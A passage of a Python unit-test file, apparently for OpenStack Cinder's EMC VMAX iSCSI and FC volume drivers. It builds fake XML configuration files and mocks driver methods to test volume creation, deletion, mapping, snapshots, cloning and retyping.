self.config_file_path = self.tempdir + '/' + filename
f = open(self.config_file_path, 'w')
doc.writexml(f)
f.close()
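    # writexml() is called without indent arguments, so the file written
    # above is a single line, roughly (illustrative):
    #   <?xml version="1.0" ?><EMC><Array>1234567891011</Array>
    #   <EcomServerIp>1.1.1.1</EcomServerIp>...<Timeout>0</Timeout></EMC>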
# Create XML config file with newlines and whitespaces
# Bug #1364232
def create_fake_config_file_1364232(self):
filename = 'cinder_emc_config_1364232.xml'
self.config_file_1364232 = self.tempdir + '/' + filename
text_file = open(self.config_file_1364232, "w")
text_file.write("<?xml version='1.0' encoding='UTF-8'?>\n<EMC>\n"
"<EcomServerIp>10.108.246.202</EcomServerIp>\n"
"<EcomServerPort>5988</EcomServerPort>\n"
"<EcomUserName>admin\t</EcomUserName>\n"
"<EcomPassword>#1Password</EcomPassword>\n"
"<PortGroups><PortGroup>OS-PORTGROUP1-PG"
"</PortGroup><PortGroup>OS-PORTGROUP2-PG"
" </PortGroup>\n"
"<PortGroup>OS-PORTGROUP3-PG</PortGroup>"
"<PortGroup>OS-PORTGROUP4-PG</PortGroup>"
"</PortGroups>\n<Array>000198700439"
" \n</Array>\n<Pool>FC_SLVR1\n"
"</Pool>\n<FastPolicy>SILVER1</FastPolicy>\n"
"</EMC>")
text_file.close()
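    # The literal tabs, newlines and trailing spaces embedded above are the
    # point of this fixture: test_get_volume_stats_1364232 below asserts
    # that the parser strips them (bug #1364232).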
def fake_ecom_connection(self):
conn = FakeEcomConnection()
return conn
def fake_do_iscsi_discovery(self, volume):
output = []
        item = '10.10.0.50:3260,1 iqn.1992-04.com.emc:50000973f006dd80'
output.append(item)
return output
def fake_sleep(self, seconds):
return
def test_get_volume_stats_1364232(self):
self.create_fake_config_file_1364232()
self.assertEqual('000198700439',
self.driver.utils.parse_array_name_from_file(
self.config_file_1364232))
self.assertEqual('FC_SLVR1',
self.driver.utils.parse_pool_name_from_file(
self.config_file_1364232))
self.assertEqual('SILVER1',
self.driver.utils.parse_fast_policy_name_from_file(
self.config_file_1364232))
self.assertIn('OS-PORTGROUP',
self.driver.utils.parse_file_to_get_port_group_name(
self.config_file_1364232))
bExists = os.path.exists(self.config_file_1364232)
if bExists:
os.remove(self.config_file_1364232)
@mock.patch.object(
EMCVMAXCommon,
'_find_storageSystem',
return_value=None)
@mock.patch.object(
EMCVMAXFast,
'is_tiering_policy_enabled',
return_value=False)
@mock.patch.object(
EMCVMAXUtils,
'get_pool_capacities',
return_value=(1234, 1200))
@mock.patch.object(
EMCVMAXUtils,
'parse_array_name_from_file',
return_value="123456789")
def test_get_volume_stats_no_fast(self, mock_storage_system,
mock_is_fast_enabled,
mock_capacity, mock_array):
self.driver.get_volume_stats(True)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
def test_create_volume_no_fast_success(
self, _mock_volume_type, mock_storage_system):
self.driver.create_volume(self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
        return_value={'storagetype:stripedmetacount': '4',
'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
def test_create_volume_no_fast_striped_success(
self, _mock_volume_type, mock_storage_system):
self.driver.create_volume(self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
def test_delete_volume_no_fast_success(
self, _mock_volume_type, mock_storage_system):
self.driver.delete_volume(self.data.test_volume)
def test_create_volume_no_fast_failed(self):
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_volume,
self.data.test_failed_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
def test_delete_volume_no_fast_notfound(self, _mock_volume_type):
notfound_delete_vol = {}
notfound_delete_vol['name'] = 'notfound_delete_vol'
notfound_delete_vol['id'] = '10'
notfound_delete_vol['CreationClassName'] = 'Symmm_StorageVolume'
notfound_delete_vol['SystemName'] = self.data.storage_system
notfound_delete_vol['DeviceID'] = notfound_delete_vol['id']
notfound_delete_vol['SystemCreationClassName'] = 'Symm_StorageSystem'
notfound_delete_vol['volume_type_id'] = 'abc'
notfound_delete_vol['provider_location'] = None
name = {}
name['classname'] = 'Symm_StorageVolume'
keys = {}
keys['CreationClassName'] = notfound_delete_vol['CreationClassName']
keys['SystemName'] = notfound_delete_vol['SystemName']
keys['DeviceID'] = notfound_delete_vol['DeviceID']
keys['SystemCreationClassName'] =\
notfound_delete_vol['SystemCreationClassName']
name['keybindings'] = keys
self.driver.delete_volume(notfound_delete_vol)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
def test_delete_volume_failed(
self, _mock_volume_type, mock_storage_system):
self.driver.create_volume(self.data.failed_delete_vol)
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.delete_volume,
self.data.failed_delete_vol)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_wrap_find_device_number',
return_value={'hostlunid': 1,
'storagesystem': EMCVMAXCommonData.storage_system})
def test_map_no_fast_success(self, _mock_volume_type, mock_wrap_group,
mock_wrap_device):
self.driver.initialize_connection(self.data.test_volume,
self.data.connector)
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_wrap_find_device_number',
return_value={'storagesystem': EMCVMAXCommonData.storage_system})
def test_map_no_fast_failed(self, mock_wrap_group, mock_wrap_device):
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.initialize_connection,
self.data.test_volume,
self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
def test_detach_no_fast_success(self, mock_volume_type,
mock_storage_group):
self.driver.terminate_connection(
self.data.test_volume, self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
EMCVMAXUtils, 'find_storage_system',
return_value={'Name': EMCVMAXCommonData.storage_system})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
def test_detach_no_fast_last_volume_success(
self, mock_volume_type,
mock_storage_system, mock_storage_group):
self.driver.terminate_connection(
self.data.test_volume, self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
EMCVMAXUtils,
'get_volume_size',
return_value='2147483648')
def test_extend_volume_no_fast_success(
self, _mock_volume_type, mock_volume_size):
newSize = '2'
self.driver.extend_volume(self.data.test_volume, newSize)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
        return_value={'storagetype:stripedmetacount': '4',
'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
EMCVMAXUtils,
'check_if_volume_is_concatenated',
return_value='False')
def test_extend_volume_striped_no_fast_failed(
self, _mock_volume_type, _mock_is_concatenated):
newSize = '2'
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.extend_volume,
self.data.test_volume,
newSize)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
def test_create_snapshot_no_fast_success(
self, mock_volume_type,
mock_volume, mock_sync_sv):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_snapshot(self.data.test_volume)
def test_create_snapshot_no_fast_failed(self):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_snapshot,
self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
def test_create_volume_from_snapshot_no_fast_success(
self, mock_volume_type,
mock_volume, mock_sync_sv):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_volume_from_snapshot(
self.data.test_volume, EMCVMAXCommonData.test_source_volume)
def test_create_volume_from_snapshot_no_fast_failed(self):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_volume_from_snapshot,
self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
def test_create_clone_no_fast_success(self, mock_volume_type,
mock_volume, mock_sync_sv):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_cloned_volume(self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
def test_create_clone_no_fast_failed(self):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_cloned_volume,
self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
def test_migrate_volume_no_fast_success(self, _mock_volume_type):
self.driver.migrate_volume(self.data.test_ctxt, self.data.test_volume,
self.data.test_host)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSINoFAST'})
@mock.patch.object(
EMCVMAXUtils,
'parse_pool_instance_id',
return_value=('silver', 'SYMMETRIX+000195900551'))
def test_retype_volume_no_fast_success(
self, _mock_volume_type, mock_values):
self.driver.retype(
self.data.test_ctxt, self.data.test_volume, self.data.new_type,
self.data.diff, self.data.test_host)
def test_check_for_setup_error(self):
self.driver.configuration.iscsi_ip_address = '1.1.1.1'
self.driver.check_for_setup_error()
self.driver.configuration.iscsi_ip_address = None
self.assertRaises(exception.InvalidInput,
self.driver.check_for_setup_error)
def _cleanup(self):
bExists = os.path.exists(self.config_file_path)
if bExists:
os.remove(self.config_file_path)
shutil.rmtree(self.tempdir)
class EMCVMAXISCSIDriverFastTestCase(test.TestCase):
def setUp(self):
self.data = EMCVMAXCommonData()
self.tempdir = tempfile.mkdtemp()
super(EMCVMAXISCSIDriverFastTestCase, self).setUp()
self.config_file_path = None
self.create_fake_config_file_fast()
self.addCleanup(self._cleanup)
configuration = mock.Mock()
configuration.cinder_emc_config_file = self.config_file_path
configuration.safe_get.return_value = 'ISCSIFAST'
configuration.config_group = 'ISCSIFAST'
self.stubs.Set(EMCVMAXISCSIDriver, 'smis_do_iscsi_discovery',
self.fake_do_iscsi_discovery)
self.stubs.Set(EMCVMAXCommon, '_get_ecom_connection',
self.fake_ecom_connection)
instancename = FakeCIMInstanceName()
self.stubs.Set(EMCVMAXUtils, 'get_instance_name',
instancename.fake_getinstancename)
self.stubs.Set(time, 'sleep',
self.fake_sleep)
driver = EMCVMAXISCSIDriver(configuration=configuration)
driver.db = FakeDB()
self.driver = driver
def create_fake_config_file_fast(self):
doc = Document()
emc = doc.createElement("EMC")
doc.appendChild(emc)
array = doc.createElement("Array")
arraytext = doc.createTextNode("1234567891011")
emc.appendChild(array)
array.appendChild(arraytext)
fastPolicy = doc.createElement("FastPolicy")
fastPolicyText = doc.createTextNode("GOLD1")
emc.appendChild(fastPolicy)
fastPolicy.appendChild(fastPolicyText)
ecomserverip = doc.createElement("EcomServerIp")
ecomserveriptext = doc.createTextNode("1.1.1.1")
emc.appendChild(ecomserverip)
ecomserverip.appendChild(ecomserveriptext)
ecomserverport = doc.createElement("EcomServerPort")
ecomserverporttext = doc.createTextNode("10")
emc.appendChild(ecomserverport)
ecomserverport.appendChild(ecomserverporttext)
ecomusername = doc.createElement("EcomUserName")
ecomusernametext = doc.createTextNode("user")
emc.appendChild(ecomusername)
ecomusername.appendChild(ecomusernametext)
ecompassword = doc.createElement("EcomPassword")
ecompasswordtext = doc.createTextNode("pass")
emc.appendChild(ecompassword)
ecompassword.appendChild(ecompasswordtext)
timeout = doc.createElement("Timeout")
timeouttext = doc.createTextNode("0")
emc.appendChild(timeout)
timeout.appendChild(timeouttext)
portgroup = doc.createElement("PortGroup")
portgrouptext = doc.createTextNode("myPortGroup")
portgroup.appendChild(portgrouptext)
pool = doc.createElement("Pool")
pooltext = doc.createTextNode("gold")
emc.appendChild(pool)
pool.appendChild(pooltext)
array = doc.createElement("Array")
arraytext = doc.createTextNode("0123456789")
emc.appendChild(array)
array.appendChild(arraytext)
portgroups = doc.createElement("PortGroups")
portgroups.appendChild(portgroup)
emc.appendChild(portgroups)
filename = 'cinder_emc_config_ISCSIFAST.xml'
self.config_file_path = self.tempdir + '/' + filename
f = open(self.config_file_path, 'w')
doc.writexml(f)
f.close()
def fake_ecom_connection(self):
conn = FakeEcomConnection()
return conn
def fake_do_iscsi_discovery(self, volume):
output = []
        item = '10.10.0.50:3260,1 iqn.1992-04.com.emc:50000973f006dd80'
output.append(item)
return output
def fake_sleep(self, seconds):
return
@mock.patch.object(
EMCVMAXCommon,
'_find_storageSystem',
return_value=None)
@mock.patch.object(
EMCVMAXFast,
'is_tiering_policy_enabled',
return_value=True)
@mock.patch.object(
EMCVMAXFast,
'get_tier_policy_by_name',
return_value=None)
@mock.patch.object(
EMCVMAXFast,
'get_capacities_associated_to_policy',
return_value=(1234, 1200))
@mock.patch.object(
EMCVMAXUtils,
'parse_array_name_from_file',
return_value="123456789")
def test_get_volume_stats_fast(self, mock_storage_system,
mock_is_fast_enabled,
mock_get_policy, mock_capacity, mock_array):
self.driver.get_volume_stats(True)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
@mock.patch.object(
EMCVMAXFast,
'get_pool_associated_to_policy',
return_value=1)
def test_create_volume_fast_success(
self, _mock_volume_type, mock_storage_system, mock_pool_policy):
self.driver.create_volume(self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
        return_value={'storagetype:stripedmetacount': '4',
'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
@mock.patch.object(
EMCVMAXFast,
'get_pool_associated_to_policy',
return_value=1)
def test_create_volume_fast_striped_success(
self, _mock_volume_type, mock_storage_system, mock_pool_policy):
self.driver.create_volume(self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
def test_delete_volume_fast_success(
self, _mock_volume_type, mock_storage_group):
self.driver.delete_volume(self.data.test_volume)
def test_create_volume_fast_failed(self):
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_volume,
self.data.test_failed_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
def test_delete_volume_fast_notfound(
self, _mock_volume_type, mock_wrapper):
notfound_delete_vol = {}
notfound_delete_vol['name'] = 'notfound_delete_vol'
notfound_delete_vol['id'] = '10'
notfound_delete_vol['CreationClassName'] = 'Symmm_StorageVolume'
notfound_delete_vol['SystemName'] = self.data.storage_system
notfound_delete_vol['DeviceID'] = notfound_delete_vol['id']
notfound_delete_vol['SystemCreationClassName'] = 'Symm_StorageSystem'
name = {}
name['classname'] = 'Symm_StorageVolume'
keys = {}
keys['CreationClassName'] = notfound_delete_vol['CreationClassName']
keys['SystemName'] = notfound_delete_vol['SystemName']
keys['DeviceID'] = notfound_delete_vol['DeviceID']
keys['SystemCreationClassName'] =\
notfound_delete_vol['SystemCreationClassName']
name['keybindings'] = keys
notfound_delete_vol['volume_type_id'] = 'abc'
notfound_delete_vol['provider_location'] = None
self.driver.delete_volume(notfound_delete_vol)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
@mock.patch.object(
EMCVMAXFast,
'get_pool_associated_to_policy',
return_value=1)
def test_delete_volume_fast_failed(
self, _mock_volume_type, _mock_storage_group,
mock_storage_system, mock_policy_pool):
self.driver.create_volume(self.data.failed_delete_vol)
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.delete_volume,
self.data.failed_delete_vol)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_wrap_find_device_number',
return_value={'hostlunid': 1,
'storagesystem': EMCVMAXCommonData.storage_system})
def test_map_fast_success(self, _mock_volume_type, mock_wrap_group,
mock_wrap_device):
self.driver.initialize_connection(self.data.test_volume,
self.data.connector)
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_wrap_find_device_number',
return_value={'storagesystem': EMCVMAXCommonData.storage_system})
def test_map_fast_failed(self, mock_wrap_group, mock_wrap_device):
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.initialize_connection,
self.data.test_volume,
self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
def test_detach_fast_success(self, mock_volume_type,
mock_storage_group):
self.driver.terminate_connection(
self.data.test_volume, self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXUtils, 'find_storage_system',
return_value={'Name': EMCVMAXCommonData.storage_system})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
def test_detach_fast_last_volume_success(
self, mock_volume_type,
mock_storage_system, mock_storage_group):
self.driver.terminate_connection(
self.data.test_volume, self.data.connector)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXUtils,
'get_volume_size',
return_value='2147483648')
def test_extend_volume_fast_success(
self, _mock_volume_type, mock_volume_size):
newSize = '2'
self.driver.extend_volume(self.data.test_volume, newSize)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXUtils,
'check_if_volume_is_concatenated',
return_value='False')
def test_extend_volume_striped_fast_failed(
self, _mock_volume_type, _mock_is_concatenated):
newSize = '2'
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.extend_volume,
self.data.test_volume,
newSize)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST',
'FASTPOLICY': 'FC_GOLD1'})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
@mock.patch.object(
EMCVMAXUtils,
'find_storage_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXUtils,
'find_controller_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXCommon,
'_get_or_create_default_storage_group',
return_value=1)
def test_create_snapshot_fast_success(
self, mock_volume_type, mock_storage_group, mock_volume,
mock_sync_sv, mock_storage_config_service, mock_controller_service,
mock_default_sg):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_snapshot(self.data.test_volume)
def test_create_snapshot_fast_failed(self):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_snapshot,
self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST',
'FASTPOLICY': 'FC_GOLD1'})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
@mock.patch.object(
EMCVMAXUtils,
'find_storage_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXUtils,
'find_controller_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXCommon,
'_get_or_create_default_storage_group',
return_value=1)
def test_create_volume_from_snapshot_fast_success(
self, mock_volume_type, mock_storage_group, mock_volume,
mock_sync_sv, mock_storage_config_service, mock_controller_service,
mock_default_sg):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_volume_from_snapshot(
self.data.test_volume, EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST',
'FASTPOLICY': 'FC_GOLD1'})
@mock.patch.object(
EMCVMAXUtils,
'find_replication_service',
return_value=None)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
def test_create_volume_from_snapshot_fast_failed(
self, mock_volume_type,
mock_rep_service, mock_sync_sv):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_volume_from_snapshot,
self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST',
'FASTPOLICY': 'FC_GOLD1'})
@mock.patch.object(
EMCVMAXUtils,
'find_storage_masking_group',
return_value=EMCVMAXCommonData.storagegroupname)
@mock.patch.object(
FakeDB,
'volume_get',
return_value=EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
@mock.patch.object(
EMCVMAXUtils,
'find_storage_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXUtils,
'find_controller_configuration_service',
return_value=1)
@mock.patch.object(
EMCVMAXCommon,
'_get_or_create_default_storage_group',
return_value=1)
def test_create_clone_fast_success(self, mock_volume_type,
mock_storage_group, mock_volume,
mock_sync_sv,
mock_storage_config_service,
mock_controller_service,
mock_default_sg):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.driver.create_cloned_volume(self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST',
'FASTPOLICY': 'FC_GOLD1'})
@mock.patch.object(
EMCVMAXCommon,
'_find_storage_sync_sv_sv',
return_value=(None, None))
def test_create_clone_fast_failed(self, mock_volume_type,
mock_sync_sv):
self.data.test_volume['volume_name'] = "vmax-1234567"
self.assertRaises(exception.VolumeBackendAPIException,
self.driver.create_cloned_volume,
self.data.test_volume,
EMCVMAXCommonData.test_source_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
def test_migrate_volume_fast_success(self, _mock_volume_type):
self.driver.migrate_volume(self.data.test_ctxt, self.data.test_volume,
self.data.test_host)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'ISCSIFAST'})
@mock.patch.object(
EMCVMAXUtils,
'parse_pool_instance_id',
return_value=('silver', 'SYMMETRIX+000195900551'))
@mock.patch.object(
EMCVMAXMasking,
'_wrap_get_storage_group_from_volume',
return_value=None)
def test_retype_volume_fast_success(
self, _mock_volume_type, mock_values, mock_wrap):
self.driver.retype(
self.data.test_ctxt, self.data.test_volume, self.data.new_type,
self.data.diff, self.data.test_host)
def _cleanup(self):
bExists = os.path.exists(self.config_file_path)
if bExists:
os.remove(self.config_file_path)
shutil.rmtree(self.tempdir)
class EMCVMAXFCDriverNoFastTestCase(test.TestCase):
def setUp(self):
self.data = EMCVMAXCommonData()
self.tempdir = tempfile.mkdtemp()
super(EMCVMAXFCDriverNoFastTestCase, self).setUp()
self.config_file_path = None
self.create_fake_config_file_no_fast()
self.addCleanup(self._cleanup)
configuration = mock.Mock()
configuration.cinder_emc_config_file = self.config_file_path
configuration.safe_get.return_value = 'FCNoFAST'
configuration.config_group = 'FCNoFAST'
self.stubs.Set(EMCVMAXCommon, '_get_ecom_connection',
self.fake_ecom_connection)
instancename = FakeCIMInstanceName()
self.stubs.Set(EMCVMAXUtils, 'get_instance_name',
instancename.fake_getinstancename)
self.stubs.Set(time, 'sleep',
self.fake_sleep)
driver = EMCVMAXFCDriver(configuration=configuration)
driver.db = FakeDB()
self.driver = driver
def create_fake_config_file_no_fast(self):
doc = Document()
emc = doc.createElement("EMC")
doc.appendChild(emc)
array = doc.createElement("Array")
arraytext = doc.createTextNode("1234567891011")
emc.appendChild(array)
array.appendChild(arraytext)
ecomserverip = doc.createElement("EcomServerIp")
ecomserveriptext = doc.createTextNode("1.1.1.1")
emc.appendChild(ecomserverip)
ecomserverip.appendChild(ecomserveriptext)
ecomserverport = doc.createElement("EcomServerPort")
ecomserverporttext = doc.createTextNode("10")
emc.appendChild(ecomserverport)
ecomserverport.appendChild(ecomserverporttext)
ecomusername = doc.createElement("EcomUserName")
ecomusernametext = doc.createTextNode("user")
emc.appendChild(ecomusername)
ecomusername.appendChild(ecomusernametext)
ecompassword = doc.createElement("EcomPassword")
ecompasswordtext = doc.createTextNode("pass")
emc.appendChild(ecompassword)
ecompassword.appendChild(ecompasswordtext)
portgroup = doc.createElement("PortGroup")
portgrouptext = doc.createTextNode("myPortGroup")
portgroup.appendChild(portgrouptext)
portgroups = doc.createElement("PortGroups")
portgroups.appendChild(portgroup)
emc.appendChild(portgroups)
pool = doc.createElement("Pool")
pooltext = doc.createTextNode("gold")
emc.appendChild(pool)
pool.appendChild(pooltext)
array = doc.createElement("Array")
arraytext = doc.createTextNode("0123456789")
emc.appendChild(array)
array.appendChild(arraytext)
timeout = doc.createElement("Timeout")
timeouttext = doc.createTextNode("0")
emc.appendChild(timeout)
timeout.appendChild(timeouttext)
filename = 'cinder_emc_config_FCNoFAST.xml'
self.config_file_path = self.tempdir + '/' + filename
        with open(self.config_file_path, 'w') as f:
            doc.writexml(f)
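    # For reference, the generated config file looks roughly like this
    # (element order as appended above):
    #
    #   <EMC>
    #     <Array>1234567891011</Array>
    #     <EcomServerIp>1.1.1.1</EcomServerIp>
    #     <EcomServerPort>10</EcomServerPort>
    #     <EcomUserName>user</EcomUserName>
    #     <EcomPassword>pass</EcomPassword>
    #     <PortGroups><PortGroup>myPortGroup</PortGroup></PortGroups>
    #     <Pool>gold</Pool>
    #     <Array>0123456789</Array>
    #     <Timeout>0</Timeout>
    #   </EMC>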
def fake_ecom_connection(self):
conn = FakeEcomConnection()
return conn
def fake_sleep(self, seconds):
return
@mock.patch.object(
EMCVMAXCommon,
'_find_storageSystem',
return_value=None)
@mock.patch.object(
EMCVMAXFast,
'is_tiering_policy_enabled',
return_value=False)
@mock.patch.object(
EMCVMAXUtils,
'get_pool_capacities',
return_value=(1234, 1200))
@mock.patch.object(
EMCVMAXUtils,
'parse_array_name_from_file',
return_value="123456789")
def test_get_volume_stats_no_fast(self,
mock_storage_system,
mock_is_fast_enabled,
mock_capacity,
mock_array):
self.driver.get_volume_stats(True)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
def test_create_volume_no_fast_success(
self, _mock_volume_type, mock_storage_system):
self.driver.create_volume(self.data.test_volume)
@mock.patch.object(
volume_types,
'get_volume_type_extra_specs',
return_value={'storagetype: stripedmetacount': '4',
'volume_backend_name': 'FCNoFAST'})
@mock.patch.object(
EMCVMAXCommon,
'_get_pool_and_storage_system',
return_value=(None, EMCVMAXCommonData.storage_system))
def test_create_volume_no_fast_striped_success(
self, _mock_volume_type, mock_storage_system):
